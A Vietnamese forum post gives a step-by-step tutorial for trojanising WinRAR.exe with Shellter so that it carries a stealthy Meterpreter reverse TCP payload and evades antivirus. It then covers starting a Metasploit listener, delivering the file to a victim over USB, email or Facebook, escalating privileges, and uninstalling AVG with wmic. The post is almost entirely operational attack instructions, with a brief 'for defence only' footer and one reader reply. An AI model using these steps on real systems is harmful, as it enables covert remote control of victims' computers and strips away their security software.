[Metasploit] Bypass và gỡ phần mềm antivirus trên máy nạn nhân bằng shellter

maldet

VIP Members
31/08/2016
112
103 bài viết
[Metasploit] Bypass và gỡ phần mềm antivirus trên máy nạn nhân bằng shellter
Bước 1: Bypass antivirus với shelter
Tải về shellter tại đây.
Chạy shellter từ Terminal. Lần lượt thực hiện các bước sau.

cd Desktop/shellter (thư mục shelter đặt ở Desktop)
wine32 shellter.exe
Operation Mode: Chọn A (Automatic)
PE Target: đường dẫn chứa tập tin thực thi để bypass (ở đây dùng Winrar.exe)
Enable Stealth Mode: Chọn Y (Bật Stealth Mode)
Use a listed payload or custom: Chọn L
Select payload by index: Chọn 1 (Meterpreter Reverse TCP)
Set LHOST: IP của máy tấn công
Set LPORT: 8080
Ok đã xong bước 1.

Bước 2: Chạy Metasploit Listener
service postgresql start
msfconsole

20171f9bf876-079c-480b-b1eb-c8a2d6168377.png

Bước 3: Gửi tập tin cho nạn nhân (đã được bypass thành công) và gỡ phần mềm antivirus trên máy nạn nhân

Có thể dùng nhiều cách để gửi (copy qua USB, gửi qua email, facebook,...)
Sau khi tập tin thực thi (Winrar.exe) được nạn nhân chạy lên. Một session được mở.

2017301a141f-76d6-409a-8c3e-3008f38dd5c5.png

session -i 1 (làm việc với session 1)
sysinfo (xem thông tin hệ thống)
ps (xem các tiến trình đang chạy trên hệ thống, tìm thấy tiến trình avgidsagent.exe của AVG Antivirus)
getsystem
getuid
wmic product get name (xem các phần mềm được cài trên máy tính nạn nhân)
wmic product where name="AVG" call uninstall /nointeractive (gỡ phần mềm AVG Antivirus)


Gỡ thành công AVG!

Xem hướng dẫn chi tiết tại video sau:


 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: Sugi_b3o and whf
Metaploit là một tool để khai thác lỗ hổng à a
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên